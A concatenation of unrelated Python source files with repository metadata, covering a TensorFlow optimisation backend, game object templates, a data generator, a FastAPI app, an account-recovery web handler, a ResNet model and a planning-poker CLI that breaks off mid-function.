self._session = tf.Session()
def __str__(self):
return "tensorflow"
def is_available(self):
return tf is not None
@assert_backend_available
def is_compatible(self, objective, argument):
if isinstance(objective, tf.Tensor):
if (argument is None or not
isinstance(argument, tf.Variable) and not
all([isinstance(arg, tf.Variable)
for arg in argument])):
raise ValueError(
"Tensorflow backend requires an argument (or sequence of "
"arguments) with respect to which compilation is to be "
"carried out")
return True
return False
@assert_backend_available
def compile_function(self, objective, argument):
if not isinstance(argument, list):
def func(x):
feed_dict = {argument: x}
return self._session.run(objective, feed_dict)
else:
def func(x):
feed_dict = {i: d for i, d in zip(argument, x)}
return self._session.run(objective, feed_dict)
return func
@assert_backend_available
def compute_gradient(self, objective, argument):
"""
Compute the gradient of 'objective' and return as a function.
"""
tfgrad = tf.gradients(objective, argument)
if not isinstance(argument, list):
def grad(x):
feed_dict = {argument: x}
return self._session.run(tfgrad[0], feed_dict)
else:
def grad(x):
feed_dict = {i: d for i, d in zip(argument, x)}
return self._session.run(tfgrad, feed_dict)
return grad
@assert_backend_available
def compute_hessian(self, objective, argument):
if not isinstance(argument, list):
argA = tf.Variable(tf.zeros(tf.shape(argument)))
tfhess = _hessian_vector_product(objective, [argument], [argA])
def hess(x, a):
feed_dict = {argument: x, argA: a}
return self._session.run(tfhess[0], feed_dict)
else:
argA = [tf.Variable(tf.zeros(tf.shape(arg)))
for arg in argument]
tfhess = _hessian_vector_product(objective, argument, argA)
def hess(x, a):
feed_dict = {i: d for i, d in zip(argument+argA, x+a)}
return self._session.run(tfhess, feed_dict)
return hess
| 30.625 | 78 | 0.584354 |
5581cd3dd132efe9cc3a64ad838cd98d5d601143
| 461 |
py
|
Python
|
data/scripts/templates/object/weapon/melee/polearm/shared_lance_lightsaber_01.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20 |
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/weapon/melee/polearm/shared_lance_lightsaber_01.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/weapon/melee/polearm/shared_lance_lightsaber_01.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20 |
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Weapon()
result.template = "object/weapon/melee/polearm/shared_lance_lightsaber_01.iff"
result.attribute_template_id = 10
result.stfName("weapon_name","lance_lightsaber")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 27.117647 | 79 | 0.735358 |
5caaa49ed3c941c1fa8c44b84c358ec2f1b92d4b
| 882 |
py
|
Python
|
BuildSimHubAPI/measures/__init__.py
|
mostaphaRoudsari/buildsimhub_python_api
|
4a562a678fc2f9671f9fc62faae46b79c448a922
|
[
"MIT"
] | null | null | null |
BuildSimHubAPI/measures/__init__.py
|
mostaphaRoudsari/buildsimhub_python_api
|
4a562a678fc2f9671f9fc62faae46b79c448a922
|
[
"MIT"
] | null | null | null |
BuildSimHubAPI/measures/__init__.py
|
mostaphaRoudsari/buildsimhub_python_api
|
4a562a678fc2f9671f9fc62faae46b79c448a922
|
[
"MIT"
] | null | null | null |
# not needed to import this module - hide it from the public
# from BuildSimHubAPI.actions import ModelAction
from .window_uvalue import WindowUValue
from .window_shgc import WindowSHGC
from .window_wall_ratio import WindowWallRatio
from .wall_rvalue import WallRValue
from .roof_rvalue import RoofRValue
from .light_lpd import LightLPD
from .infiltration import Infiltration
from .occupancy_sensor import OccupancySensor
from .daylit_sensor import DaylightingSensor
from .cooling_all_cop import CoolingCOP
from .cooling_coil_cop import CoolingCoilCOP
from .cooling_chiller_cop import CoolingChillerCOP
from .heating_efficiency import HeatingEfficiency
from .window_wall_ratio_south import WindowWallRatioSouth
from .window_wall_ratio_west import WindowWallRatioWest
from .window_wall_ratio_east import WindowWallRatioEast
from .window_wall_ratio_north import WindowWallRatioNorth
| 42 | 60 | 0.877551 |
c6b4d06d651a50061aae3c78a2f4d1b256b0dbfc
| 2,313 |
py
|
Python
|
utils/data_generator.py
|
nodamu/Car-Ticketing-Project
|
a1e38d6d0c844b03b62b6ed07aabc18934cc83f5
|
[
"Linux-OpenIB"
] | 29 |
2019-07-22T01:57:42.000Z
|
2022-03-31T15:51:42.000Z
|
utils/data_generator.py
|
nodamu/Car-Ticketing-Project
|
a1e38d6d0c844b03b62b6ed07aabc18934cc83f5
|
[
"Linux-OpenIB"
] | 6 |
2020-02-13T06:11:55.000Z
|
2021-06-17T18:13:08.000Z
|
utils/data_generator.py
|
nodamu/Car-Ticketing-Project
|
a1e38d6d0c844b03b62b6ed07aabc18934cc83f5
|
[
"Linux-OpenIB"
] | 17 |
2019-09-19T09:56:16.000Z
|
2021-06-12T22:42:30.000Z
|
import numpy as np
from threading import Semaphore, Thread
from time import sleep
from random import choice, randint
from pdb import set_trace as pause
class DataGenerator(object):
def __init__( self, data, process_data_item_func, xshape, yshape, \
data_item_selector = choice, \
nthreads = 2, \
pool_size = 1000, \
min_nsamples = 1, \
dtype = 'single' ):
assert pool_size >= min_nsamples, \
'Min. samples must be equal or less than pool_size'
assert min_nsamples > 0 and pool_size > 0, \
'Min. samples and pool size must be positive non-zero numbers'
self._data = data
self._process_data_item = process_data_item_func
self._data_item_selector = data_item_selector
self._xshape = xshape
self._yshape = yshape
self._nthreads = nthreads
self._pool_size = pool_size
self._min_nsamples = min_nsamples
self._dtype = dtype
self._count = 0
self._stop = False
self._threads = []
self._sem = Semaphore()
self._X, self._Y = self._get_buffers(self._pool_size)
def _get_buffers(self,N):
X = np.empty((N,) + self._xshape, dtype=self._dtype)
Y = np.empty((N,) + self._yshape, dtype=self._dtype)
return X,Y
def _compute_sample(self):
d = self._data_item_selector(self._data)
return self._process_data_item(d)
def _insert_data(self,x,y):
self._sem.acquire()
if self._count < self._pool_size:
self._X[self._count] = x
self._Y[self._count] = y
self._count += 1
else:
idx = randint(0,self._pool_size-1)
self._X[idx] = x
self._Y[idx] = y
self._sem.release()
def _run(self):
while True:
x,y = self._compute_sample()
self._insert_data(x,y)
if self._stop:
break
def stop(self):
self._stop = True
for thread in self._threads:
thread.join()
def start(self):
self._stop = False
self._threads = [Thread(target=self._run) for n in range(self._nthreads)]
for thread in self._threads:
thread.setDaemon(True)
thread.start()
def get_batch(self,N):
# Wait until the buffer was filled with the minimum
# number of samples
while self._count < self._min_nsamples:
sleep(.1)
X,Y = self._get_buffers(N)
self._sem.acquire()
for i in range(N):
idx = randint(0,self._count-1)
X[i] = self._X[idx]
Y[i] = self._Y[idx]
self._sem.release()
return X,Y
| 22.90099 | 75 | 0.68396 |
744823f4de74587e3be2b669095496c9f29d0169
| 315 |
py
|
Python
|
tests/test_linear/test_variational_regression.py
|
ctgk/bayesian_playground
|
70c63910472a29e15a4fb98e30a34b9ee155152e
|
[
"MIT"
] | 1 |
2020-10-17T19:09:32.000Z
|
2020-10-17T19:09:32.000Z
|
tests/test_linear/test_variational_regression.py
|
ctgk/bayesian
|
70c63910472a29e15a4fb98e30a34b9ee155152e
|
[
"MIT"
] | null | null | null |
tests/test_linear/test_variational_regression.py
|
ctgk/bayesian
|
70c63910472a29e15a4fb98e30a34b9ee155152e
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
from bayesian.linear import VariationalRegression
def test_fit():
model = VariationalRegression(1, 1, 100)
model.fit([-1, 1], [-1, 1])
assert np.allclose(model.predict([-1, 1])[0], [-1, 1], rtol=0., atol=1e-2)
if __name__ == "__main__":
pytest.main([__file__])
| 21 | 78 | 0.657143 |
5a1802a406647a3627f8e217b02765c64fb0fdd1
| 336 |
py
|
Python
|
python3.7/app/main.py
|
brdhunga/uvicorn-gunicorn-fastapi-docker
|
a7ff8f5fd3e5b9a8a76ce74a7b1c03071a7dc8b1
|
[
"MIT"
] | null | null | null |
python3.7/app/main.py
|
brdhunga/uvicorn-gunicorn-fastapi-docker
|
a7ff8f5fd3e5b9a8a76ce74a7b1c03071a7dc8b1
|
[
"MIT"
] | null | null | null |
python3.7/app/main.py
|
brdhunga/uvicorn-gunicorn-fastapi-docker
|
a7ff8f5fd3e5b9a8a76ce74a7b1c03071a7dc8b1
|
[
"MIT"
] | null | null | null |
import sys
import asyncio
from fastapi import FastAPI
version = f"{sys.version_info.major}.{sys.version_info.minor}"
app = FastAPI()
@app.get("/")
async def read_root():
await asyncio.sleep(7)
message = f"Hello world! From FastAPI running on Uvicorn with Gunicorn. Using Python {version}"
return {"message": message}
| 18.666667 | 99 | 0.714286 |
86c0dd855cdc44058c3fbd7d4b0289900fa9f117
| 5,514 |
py
|
Python
|
ocdskingfisher/store.py
|
odscjames/rhs-alpha
|
3ad01aea09e4768210d16dea5afdec45adb80d89
|
[
"BSD-3-Clause"
] | null | null | null |
ocdskingfisher/store.py
|
odscjames/rhs-alpha
|
3ad01aea09e4768210d16dea5afdec45adb80d89
|
[
"BSD-3-Clause"
] | null | null | null |
ocdskingfisher/store.py
|
odscjames/rhs-alpha
|
3ad01aea09e4768210d16dea5afdec45adb80d89
|
[
"BSD-3-Clause"
] | null | null | null |
import json
from ocdskingfisher.database import DatabaseStore
class Store:
def __init__(self, config, database):
self.config = config
self.collection_id = None
self.database = database
def load_collection(self, collection_source, collection_data_version, collection_sample):
self.collection_id = self.database.get_or_create_collection_id(collection_source, collection_data_version, collection_sample)
def store_file_from_local(self, filename, url, data_type, encoding, local_filename):
if data_type == 'release_package_json_lines' or data_type == 'record_package_json_lines':
try:
with open(local_filename, encoding=encoding) as f:
number = 0
raw_data = f.readline()
while raw_data:
self.store_file_item(filename, url, data_type, json.loads(raw_data), number)
raw_data = f.readline()
number += 1
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
else:
try:
with open(local_filename, encoding=encoding) as f:
data = json.load(f)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
objects_list = []
if data_type == 'record_package_list_in_results':
objects_list.extend(data['results'])
elif data_type == 'release_package_list_in_results':
objects_list.extend(data['results'])
elif data_type == 'record_package_list' or data_type == 'release_package_list':
objects_list.extend(data)
else:
objects_list.append(data)
number = 0
for item_data in objects_list:
try:
self.store_file_item(filename, url, data_type, item_data, number)
number += 1
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
self.database.mark_collection_file_store_done(self.collection_id, filename)
def store_file_item_from_local(self, filename, url, data_type, encoding, number, local_filename):
try:
with open(local_filename, encoding=encoding) as f:
data = json.load(f)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
try:
self.store_file_item(filename, url, data_type, data, number)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
def store_file_item(self, filename, url, data_type, json_data, number):
if not isinstance(json_data, dict):
raise Exception("Can not process data as JSON is not an object")
with DatabaseStore(database=self.database, collection_id=self.collection_id, file_name=filename, number=number) as store:
if data_type == 'release' or data_type == 'record':
data_list = [json_data]
elif data_type == 'release_package' or \
data_type == 'release_package_json_lines' or \
data_type == 'release_package_list_in_results' or \
data_type == 'release_package_list':
if 'releases' not in json_data:
if data_type == 'release_package_json_lines' and \
self.ignore_release_package_json_lines_missing_releases_error:
return
raise Exception("Release list not found")
elif not isinstance(json_data['releases'], list):
raise Exception("Release list which is not a list found")
data_list = json_data['releases']
elif data_type == 'record_package' or \
data_type == 'record_package_json_lines' or \
data_type == 'record_package_list_in_results' or \
data_type == 'record_package_list':
if 'records' not in json_data:
raise Exception("Record list not found")
elif not isinstance(json_data['records'], list):
raise Exception("Record list which is not a list found")
data_list = json_data['records']
else:
raise Exception("data_type not a known type")
package_data = {}
if not data_type == 'release':
for key, value in json_data.items():
if key not in ('releases', 'records'):
package_data[key] = value
for row in data_list:
if not isinstance(row, dict):
raise Exception("Row in data is not a object")
if data_type == 'record' or \
data_type == 'record_package' or \
data_type == 'record_package_json_lines' or \
data_type == 'record_package_list_in_results' or \
data_type == 'record_package_list':
store.insert_record(row, package_data)
else:
store.insert_release(row, package_data)
| 42.415385 | 133 | 0.566739 |
5c9af6a2a5eca3c4b85b521e56c4bc47addeefae
| 3,703 |
py
|
Python
|
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/handlers/auth/recovery.py
|
thecoderstudio/cookiecutter-pyramid-api
|
b3122c0d98be7179bcf726c6527096c0327d7bb7
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/handlers/auth/recovery.py
|
thecoderstudio/cookiecutter-pyramid-api
|
b3122c0d98be7179bcf726c6527096c0327d7bb7
|
[
"MIT"
] | 1 |
2021-12-17T15:10:21.000Z
|
2021-12-17T15:10:21.000Z
|
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/handlers/auth/recovery.py
|
thecoderstudio/cookiecutter-pyramid-api
|
b3122c0d98be7179bcf726c6527096c0327d7bb7
|
[
"MIT"
] | 1 |
2021-03-01T14:27:10.000Z
|
2021-03-01T14:27:10.000Z
|
import random
import time
from secrets import token_hex
from pyramid.httpexceptions import HTTPCreated
from pyramid.view import view_defaults
from sqlalchemy.orm.exc import NoResultFound
from {{cookiecutter.project_slug}}.handlers import view_config
from {{cookiecutter.project_slug}}.handlers.auth import LoginHandler
from {{cookiecutter.project_slug}}.lib.decorators import validate
from {{cookiecutter.project_slug}}.lib.factories.auth.recovery import AccountRecoveryFactory
from {{cookiecutter.project_slug}}.lib.hash import hash_plaintext
from {{cookiecutter.project_slug}}.lib.middleware.sendgrid import SendGridClient
from {{cookiecutter.project_slug}}.lib.schemas.auth import (AccountRecoveryLoginSchema,
AccountRecoverySchema)
from {{cookiecutter.project_slug}}.lib.security.auth import AuthWithRecoveryTokenManager
from {{cookiecutter.project_slug}}.models import save
from {{cookiecutter.project_slug}}.models.security.recovery_token import RecoveryToken
from {{cookiecutter.project_slug}}.models.user import get_one_user_by_email_address, User
NUMBER_OF_TOKEN_BYTES = 3
TOKEN_TTL_IN_SECONDS = 7200
MIN_TIME_PADDING_IN_DECISECONDS = 2
MAX_TIME_PADDING_IN_DECISECONDS = 8
@view_defaults(
containment=AccountRecoveryFactory,
context=AccountRecoveryFactory,
renderer='json'
)
class AccountRecoveryHandler(LoginHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth_manager = AuthWithRecoveryTokenManager(self.request)
@validate(AccountRecoverySchema())
@view_config(
path_hints=['/auth/recover-account'],
request_schema_class=AccountRecoverySchema,
permission='recovery.request_token',
tags=['authentication', 'account recovery'],
request_method='POST',
public_hint=True
)
def request_account_recovery_token(self, request_data):
response = HTTPCreated()
token = token_hex(NUMBER_OF_TOKEN_BYTES)
email_address = request_data['email_address']
self._prevent_user_enumeration()
try:
recipient = get_one_user_by_email_address(email_address)
self._invalidate_any_current_recovery_token(recipient)
self._save_recovery_token(recipient, token)
SendGridClient().send_account_recovery_email(email_address, token)
except NoResultFound:
# To avoid user enumeration we don't indicate failure.
pass
raise response
@staticmethod
def _prevent_user_enumeration():
time.sleep(random.randint(
MIN_TIME_PADDING_IN_DECISECONDS,
MAX_TIME_PADDING_IN_DECISECONDS
) / 10)
@staticmethod
def _invalidate_any_current_recovery_token(user):
try:
user.active_recovery_token.invalidate()
except AttributeError:
pass
@staticmethod
def _save_recovery_token(for_user: User, token: str):
token_hash, token_salt = hash_plaintext(token)
recovery_token = RecoveryToken(
token_hash=token_hash,
token_salt=token_salt,
for_user=for_user
)
save(recovery_token)
@validate(AccountRecoveryLoginSchema())
@view_config(
path_hints=['/auth/recover-account/login'],
request_schema_class=AccountRecoveryLoginSchema,
permission='recovery.login',
request_method='POST',
successful_response_code=200,
tags=['authentication', 'account recovery'],
name='login',
public_hint=True
)
def login(self, login_data):
self.auth_manager.login(login_data)
raise self.request.response
| 35.951456 | 92 | 0.719147 |
c4f2528af9c2d70ff5fd86fa2bfab554e730e0d0
| 236 |
py
|
Python
|
pysrc/__init__.py
|
uuosio/uuosk
|
505d93ebac9e158bf96c2420a7dc7ca84c73eea4
|
[
"MIT"
] | 5 |
2021-03-01T10:46:32.000Z
|
2022-02-25T05:28:15.000Z
|
pysrc/__init__.py
|
uuosio/uuoskit
|
505d93ebac9e158bf96c2420a7dc7ca84c73eea4
|
[
"MIT"
] | 2 |
2021-06-13T18:12:52.000Z
|
2022-02-26T02:59:26.000Z
|
pysrc/__init__.py
|
uuosio/uuoskit
|
505d93ebac9e158bf96c2420a7dc7ca84c73eea4
|
[
"MIT"
] | null | null | null |
import os
import sys
from .http_client import HttpClient
from .rpc_interface import RPCInterface, WalletClient
from .chainapi_sync import ChainApi
from uuoskit import _uuoskit
__version__='1.0.4'
_uuoskit.init()
uuosapi = ChainApi()
| 18.153846 | 53 | 0.813559 |
69105b40ac3431c58d9711f315cf55dd4f4b8a35
| 29 |
py
|
Python
|
moyu_engine/config/__init__.py
|
MoYuStudio/MoYuEngine
|
7d9ab5c9cb268de0071e798a3288f0bbb651795e
|
[
"Apache-2.0"
] | 2 |
2022-03-22T02:32:34.000Z
|
2022-03-22T02:32:43.000Z
|
moyu_engine/config/__init__.py
|
MoYuStudio/MoYuEngine
|
7d9ab5c9cb268de0071e798a3288f0bbb651795e
|
[
"Apache-2.0"
] | null | null | null |
moyu_engine/config/__init__.py
|
MoYuStudio/MoYuEngine
|
7d9ab5c9cb268de0071e798a3288f0bbb651795e
|
[
"Apache-2.0"
] | null | null | null |
from .global_config import *
| 14.5 | 28 | 0.793103 |
bf906b708f2a907d0ce4a0405ee3587df52b5352
| 2,431 |
py
|
Python
|
runner/ws_ingest/subscribe.py
|
abhid/helix
|
127d445a7a79ffc0c8a2a882784078bfa2b43e72
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
runner/ws_ingest/subscribe.py
|
abhid/helix
|
127d445a7a79ffc0c8a2a882784078bfa2b43e72
|
[
"BSD-3-Clause-Clear"
] | 13 |
2020-02-29T06:07:34.000Z
|
2022-02-26T20:15:48.000Z
|
runner/ws_ingest/subscribe.py
|
abhid/helix
|
127d445a7a79ffc0c8a2a882784078bfa2b43e72
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import asyncio
from asyncio.tasks import FIRST_COMPLETED
import ssl
import json
import sys
import time
from websockets import ConnectionClosed
from ws_stomp import WebSocketStomp
import redis
import argparse
def key_enter_callback(event):
sys.stdin.readline()
event.set()
async def future_read_message(ws, future):
try:
message = await ws.stomp_read_message()
future.set_result(message)
except ConnectionClosed:
print('Websocket connection closed')
async def subscribe_loop(nodename, secret, ws_url, pubsub_node, topic):
ws = WebSocketStomp(ws_url, nodename, secret, ssl._create_unverified_context())
r = redis.Redis(host='localhost', port=6379, db=0)
await ws.connect()
await ws.stomp_connect(pubsub_node)
await ws.stomp_subscribe(topic)
# setup keyboard callback
stop_event = asyncio.Event()
asyncio.get_event_loop().add_reader(sys.stdin, key_enter_callback, stop_event)
print("press <enter> to disconnect...")
while True:
future = asyncio.Future()
future_read = future_read_message(ws, future)
await asyncio.wait([stop_event.wait(), future_read], return_when=FIRST_COMPLETED)
if not stop_event.is_set():
message = json.loads(future.result())
r.rpush("stomp:"+topic, json.dumps(message))
# [print(i["state"] + " | " + i["userName"]) for i in message["sessions"]]
else:
await ws.stomp_disconnect('123')
# wait for receipt
await asyncio.sleep(3)
await ws.disconnect()
break
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--nodename', help='pxGrid controller node name')
parser.add_argument('-w', '--webservice', help='pxGrid webservice path')
parser.add_argument('-t', '--topic', help='webservice topic')
parser.add_argument('-u', '--username', help='Client node name')
parser.add_argument('-p', '--password', help='Password (optional)')
config = parser.parse_args()
asyncio.get_event_loop().run_until_complete(subscribe_loop(config.username, config.password, config.webservice, config.nodename, config.topic))
# asyncio.get_event_loop().run_until_complete(subscribe_loop("isebox", "MDDqnieTIgzwAoq8", "wss://e-tddc-ise2-psn4.medcampus.org:8910/pxgrid/ise/pubsub", "e-tddc-ise2-psn4.medcampus.org", "/topic/com.cisco.ise.session"))
| 41.20339 | 224 | 0.69313 |
0f5c21d2ac525e624337db26a330bed69c73e03b
| 1,279 |
py
|
Python
|
makelink.py
|
murattatar/Steemit-Manuel-Search-Tool
|
13d856fa175f4388d6a06d4666ebcb715d7745ff
|
[
"MIT"
] | null | null | null |
makelink.py
|
murattatar/Steemit-Manuel-Search-Tool
|
13d856fa175f4388d6a06d4666ebcb715d7745ff
|
[
"MIT"
] | null | null | null |
makelink.py
|
murattatar/Steemit-Manuel-Search-Tool
|
13d856fa175f4388d6a06d4666ebcb715d7745ff
|
[
"MIT"
] | null | null | null |
########################################
## Month names, November 2017 by Murat Tatar
## Baglanti fonksiyonu: https://forum.ubuntu-tr.net/index.php?topic=37782.msg453829#msg453829
########################################
def MakeLink(word):
list = {"ı": "i",
"I": "i",
"Ç": "c",
"ç": "c",
" ": "-",
"ş": "s",
"Ş": "s",
"Ğ": "g",
"ğ": "g",
"Ü": "u",
"ü": "u",
"Ö": "o",
"ö": "o"}
word = word.encode('utf8', 'replace')
for ltr in list:
word = word.replace(ltr, list[ltr])
return word.lower()
def TurkceAy(ingAy):
if ingAy == "January": trAy=u"Ocak"
elif ingAy == "February": trAy=u"Şubat"
elif ingAy == "March": trAy=u"Mart"
elif ingAy == "April": trAy=u"Nisan"
elif ingAy == "May": trAy=u"Mayıs"
elif ingAy == "June": trAy=u"Haziran"
elif ingAy == "July": trAy=u"Temmuz"
elif ingAy == "August": trAy=u"Ağustos"
elif ingAy == "September": trAy=u"Eylül"
elif ingAy == "October": trAy=u"Ekim"
elif ingAy == "November": trAy=u"Kasım"
elif ingAy == "December": trAy=u"Aralık"
return trAy
| 26.102041 | 94 | 0.436278 |
0c51dcf3fdb890eda3cc107a0acbbbc652b1ebc0
| 6,051 |
py
|
Python
|
gluoncv/model_zoo/faster_rcnn/resnet50_v2a.py
|
leezu/gluon-cv
|
03ec37c7813da1845f7f287bba0452a7b95a3fa4
|
[
"Apache-2.0"
] | 1 |
2019-01-26T23:55:59.000Z
|
2019-01-26T23:55:59.000Z
|
gluoncv/model_zoo/faster_rcnn/resnet50_v2a.py
|
leezu/gluon-cv
|
03ec37c7813da1845f7f287bba0452a7b95a3fa4
|
[
"Apache-2.0"
] | null | null | null |
gluoncv/model_zoo/faster_rcnn/resnet50_v2a.py
|
leezu/gluon-cv
|
03ec37c7813da1845f7f287bba0452a7b95a3fa4
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=arguments-differ
"""Resnet50 v2a model which take original image with zero mean and uniform std."""
import mxnet as mx
from mxnet.gluon import nn, HybridBlock
__all__ = ['resnet50_v2a']
def _conv3x3(channels, stride, in_channels):
"""add conv 3x3 block."""
return nn.Conv2D(channels, kernel_size=3, strides=stride, padding=1,
use_bias=False, in_channels=in_channels)
class BottleneckV2(HybridBlock):
"""Bottleneck V2 for internal use."""
def __init__(self, channels, stride, downsample=False, in_channels=0, **kwargs):
super(BottleneckV2, self).__init__(**kwargs)
self.bn1 = nn.BatchNorm(epsilon=2e-5, use_global_stats=True)
self.conv1 = nn.Conv2D(channels // 4, kernel_size=1, strides=1, use_bias=False)
self.bn2 = nn.BatchNorm(epsilon=2e-5, use_global_stats=True)
self.conv2 = _conv3x3(channels // 4, stride, channels // 4)
self.bn3 = nn.BatchNorm(epsilon=2e-5, use_global_stats=True)
self.conv3 = nn.Conv2D(channels, kernel_size=1, strides=1, use_bias=False)
if downsample:
self.downsample = nn.Conv2D(channels, 1, stride, use_bias=False,
in_channels=in_channels)
else:
self.downsample = None
def hybrid_forward(self, F, x):
"""Custom forward."""
residual = x
x = self.bn1(x)
x = F.Activation(x, act_type='relu')
if self.downsample:
residual = self.downsample(x)
x = self.conv1(x)
x = self.bn2(x)
x = F.Activation(x, act_type='relu')
x = self.conv2(x)
x = self.bn3(x)
x = F.Activation(x, act_type='relu')
x = self.conv3(x)
return x + residual
class Rescale(HybridBlock):
"""Rescale layer/block that restore the original by
the default mean [0.485, 0.456, 0.406] and std [0.229, 0.224, 0.225].
"""
def __init__(self, **kwargs):
super(Rescale, self).__init__(**kwargs)
with self.name_scope():
init_scale = mx.nd.array([0.229, 0.224, 0.225]).reshape((1, 3, 1, 1)) * 255
self.init_scale = self.params.get_constant('init_scale', init_scale)
init_mean = mx.nd.array([0.485, 0.456, 0.406]).reshape((1, 3, 1, 1)) * 255
self.init_mean = self.params.get_constant('init_mean', init_mean)
def hybrid_forward(self, F, x, init_scale, init_mean):
"""Restore original image scale."""
x = F.broadcast_mul(x, init_scale) # restore std
x = F.broadcast_add(x, init_mean) # restore mean
return x
class ResNet50V2(HybridBlock):
"""Resnet v2(a) for Faster-RCNN.
Please ignore this if you are looking for model for other tasks.
"""
def __init__(self, **kwargs):
super(ResNet50V2, self).__init__(**kwargs)
with self.name_scope():
self.rescale = nn.HybridSequential(prefix='')
self.rescale.add(Rescale(prefix=''))
self.layer0 = nn.HybridSequential(prefix='')
self.layer0.add(nn.BatchNorm(scale=False, epsilon=2e-5, use_global_stats=True))
self.layer0.add(nn.Conv2D(64, 7, 2, 3, use_bias=False))
self.layer0.add(nn.BatchNorm(epsilon=2e-5, use_global_stats=True))
self.layer0.add(nn.Activation('relu'))
self.layer0.add(nn.MaxPool2D(3, 2, 1))
self.layer1 = self._make_layer(stage_index=1, layers=3, in_channels=64,
channels=256, stride=1)
self.layer2 = self._make_layer(stage_index=2, layers=4, in_channels=256,
channels=512, stride=2)
self.layer3 = self._make_layer(stage_index=3, layers=6, in_channels=512,
channels=1024, stride=2)
self.layer4 = self._make_layer(stage_index=4, layers=3, in_channels=1024,
channels=2048, stride=2)
self.layer4.add(nn.BatchNorm(epsilon=2e-5, use_global_stats=True))
self.layer4.add(nn.Activation('relu'))
# self.layer4.add(nn.GlobalAvgPool2D())
# self.layer4.add(nn.Flatten())
def _make_layer(self, stage_index, layers, channels, stride, in_channels=0):
layer = nn.HybridSequential(prefix='stage%d_' % stage_index)
with layer.name_scope():
layer.add(BottleneckV2(channels, stride, channels != in_channels,
in_channels=in_channels, prefix=''))
for _ in range(layers - 1):
layer.add(BottleneckV2(channels, 1, False, in_channels=channels, prefix=''))
return layer
# pylint: disable=unused-argument
def hybrid_forward(self, F, x):
"""Custom forward."""
x = self.rescale(x)
x = self.layer0(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def resnet50_v2a(pretrained=False, root='~/.mxnet/models', ctx=mx.cpu(0), **kwargs):
"""Constructs a ResNet50-v2a model.
Please ignore this if you are looking for model for other tasks.
Parameters
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
ctx : Context, default mx.cpu(0)
The context in which to load the pretrained weights.
norm_layer : object
Normalization layer used in backbone network (default: :class:`mxnet.gluon.nn.BatchNorm`;
"""
model = ResNet50V2(prefix='', **kwargs)
if pretrained:
from ..model_store import get_model_file
model.load_params(get_model_file('resnet%d_v%da'%(50, 2),
root=root), ctx=ctx, allow_missing=True)
for v in model.collect_params(select='init_scale|init_mean').values():
v.initialize(force_reinit=True, ctx=ctx)
return model
| 42.020833 | 97 | 0.603867 |
0a58f62a5b300a4a0785b7579f3dade4c6724d5f
| 14,144 |
py
|
Python
|
delta_cli.py
|
Yashwanthdantanoor1/SER516_Project-1
|
ca6213c20d5eb219b745eded4fa6e5ac54412826
|
[
"MIT"
] | 1 |
2021-02-24T14:14:28.000Z
|
2021-02-24T14:14:28.000Z
|
delta_cli.py
|
Yashwanthdantanoor1/SER516_Project-1
|
ca6213c20d5eb219b745eded4fa6e5ac54412826
|
[
"MIT"
] | 3 |
2022-02-25T05:02:59.000Z
|
2022-03-06T06:02:40.000Z
|
delta_cli.py
|
Yashwanthdantanoor1/SER516_Project-1
|
ca6213c20d5eb219b745eded4fa6e5ac54412826
|
[
"MIT"
] | 2 |
2021-03-04T10:29:58.000Z
|
2022-01-31T06:33:19.000Z
|
import argparse
import json
import requests
import time
from cmd import Cmd
from fastapi import status
from pathlib import Path
class MyPrompt(Cmd):
prompt = 'planning_poker> '
intro = "Welcome to a nice game of Planning Poker!\nType ? to list commands"
default_config_params = {"max_retries": 5,
"show_timeout": 1,
"url": "http://localhost:8000"}
default_keys_set = set(default_config_params.keys())
def __init__(self, **config_params):
super().__init__()
self.username = None
keys_set = set(config_params.keys())
common_config_keys = self.default_keys_set.intersection(keys_set)
difference_config_keys = self.default_keys_set.difference(keys_set)
if len(difference_config_keys) == 0:
for config_key, config_value in config_params.items():
setattr(self, config_key, config_value)
else:
if len(difference_config_keys) < len(self.default_keys_set):
print("Not all parameters found in configuration file.")
for config_key in common_config_keys:
setattr(self, config_key, config_params[config_key])
print(f"Using default value for {difference_config_keys}")
for config_key in difference_config_keys:
setattr(self, config_key,
self.default_config_params[config_key])
def default(self, inp):
"""
You can also use x or q to exit the game. All commands that are
not implemented will just be printed with a notification
message.
"""
if inp == 'x' or inp == 'q':
return self.do_exit()
print(f"Haven't found this command: {inp}")
@staticmethod
def print_error_response(response):
if response.status_code == status.HTTP_400_BAD_REQUEST:
print(f"{json.loads(response.text)['detail']}")
elif response.status_code == status.HTTP_412_PRECONDITION_FAILED:
print(f"{json.loads(response.text)['detail']}")
elif response.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY:
message = json.loads(response.text)['detail'][0]['msg']
print(f"{message.capitalize()}")
else:
print(f"{response.text}")
@staticmethod
def print_issue(response):
crt_issue_title = response['result_message']['title']
